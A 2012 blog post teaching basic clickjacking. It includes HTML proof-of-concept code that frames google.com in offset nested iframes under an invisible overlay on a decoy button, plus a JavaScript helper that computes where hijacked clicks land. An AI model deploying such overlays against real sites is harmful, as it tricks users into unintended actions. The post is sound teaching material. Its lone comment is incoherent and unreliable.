Tuesday, December 18, 2012


BASIC CLICKJACKING


A typical clickjacking attack uses two nested iframes to crop and position an element from a target website. The inner iframe contains the target page and must be large enough to display it in its entirety, so that the element the user will click on is visible without scrolling. The outer iframe is much smaller and acts as a window onto the page loaded in the inner iframe. For a user interface redressing attack, the outer iframe should be only large enough to display the targeted element. The user believes they are clicking on the website they see, but they are really clicking on an invisible website that sits directly under the mouse pointer. Clickjacking affects many browsers and platforms.

Inner.html

    <iframe id="inner" src="http://www.google.com" width="2000" height="2000" scrolling="no" frameborder="0">
    </iframe>


Fig 1: Inner.html

Clickjacking.html

    <iframe id="inner" src="inner.html" width="2005" height="290" scrolling="no" frameborder="0"></iframe>
    <style type="text/css">
      #inner { position: absolute; left: -1955px; top: -14px; }
    </style>

Trustedpage.html

    <h1>www.nds.rub.de</h1>
    <form action="http://www.nds.rub.de">
      <input type="submit" value="Go">
    </form>
    <iframe id="clickjacking" src="clickjacking.html" width="50" height="300" scrolling="no" frameborder="0">
    </iframe>
    <style type="text/css">
      #clickjacking { position: absolute; left: 7px; top: 81px; opacity: 0.0; }
    </style>



Fig 2: Trustedpage.html

  1. “inner.html”: Frame “google.com” (2000x2000px)
  2. “clickjacking.html”: Shift the iframe with “src=inner.html” to the left
  3. “trustedpage.html”: Place a transparent iframe with “src=clickjacking.html” over the “Go” button
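To see exactly what the transparent overlay exposes, the following added example (not code from the original post) composes the offsets of the three files above: it reports which sliver of the framed target page is reachable through the overlay and where a click on the trusted page lands in the target's own coordinates. It assumes the post's pixel values and ignores default body margins and scrolling.

```javascript
// Added example, not code from the original post. Walks the three nesting
// levels (trustedpage -> clickjacking.html -> inner.html -> target) and
// reports what the transparent overlay actually exposes. Assumes the post's
// pixel values; default body margins and scrolling are ignored.

// One entry per level, outermost first: where the parent places the frame
// (left/top in the parent's coordinates) and the size the parent shows of it.
const LAYERS = [
  // trustedpage.html: #clickjacking at (7,81), 50x300, opacity 0
  { name: "clickjacking.html", left: 7, top: 81, width: 50, height: 300 },
  // clickjacking.html: #inner at (-1955,-14), 2005x290
  { name: "inner.html", left: -1955, top: -14, width: 2005, height: 290 },
  // inner.html: the target page framed at its origin, 2000x2000
  { name: "target", left: 0, top: 0, width: 2000, height: 2000 },
];

// Intersection of two {x,y,w,h} rectangles, or null when they do not overlap.
function intersect(a, b) {
  const x = Math.max(a.x, b.x), y = Math.max(a.y, b.y);
  const r = Math.min(a.x + a.w, b.x + b.w), btm = Math.min(a.y + a.h, b.y + b.h);
  return r > x && btm > y ? { x, y, w: r - x, h: btm - y } : null;
}

// Accumulate the translation from the top page into the innermost page and
// clip each frame by every frame above it, all in top-page coordinates.
function compose(layers) {
  let clip = null, dx = 0, dy = 0;
  for (const l of layers) {
    dx += l.left; dy += l.top;   // top-page position of this frame's origin
    const rect = { x: dx, y: dy, w: l.width, h: l.height };
    clip = clip ? intersect(clip, rect) : rect;
    if (!clip) break;            // fully clipped: nothing of it is reachable
  }
  return { clip, dx, dy };
}

// Region of the target page reachable through the overlay, in the target's
// own coordinates (null if the overlay shows none of it).
function visibleTargetRegion(layers) {
  const { clip, dx, dy } = compose(layers);
  return clip && { x: clip.x - dx, y: clip.y - dy, w: clip.w, h: clip.h };
}

// Where a click at (x,y) on the trusted page lands in the target page, or
// null when the point is outside the overlay and the trusted page gets it.
function clickTarget(layers, x, y) {
  const { clip, dx, dy } = compose(layers);
  const hit = clip && x >= clip.x && x < clip.x + clip.w &&
              y >= clip.y && y < clip.y + clip.h;
  return hit ? { x: x - dx, y: y - dy } : null;
}
```

With the post's numbers, only a 45x276 px window of the target (starting at its pixel 1955,14) is reachable, and a click at (30,100) on the trusted page lands at (1978,33) in the target.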


Table 1 compares clickjacking with two other browser-based attacks by the number of Google search results each returns and the number of years each has been known.


Table 1. Clickjacking vs. browser-based attacks

    Attack                              Google results   Years
    Cross-Site Scripting (XSS)              15,700,000      15
    Cross-Site Request Forgery (CSRF)        2,870,000      11
    Clickjacking                             1,200,000       3

The following chart (Figure 3) shows the Google results for clickjacking.



Fig 3: Clickjacking growth chart

2 comments:

  1. The clickjacking script hides from view the particular advert under the actual cursor ... This is a Visual Basic script file that will bring forth a message.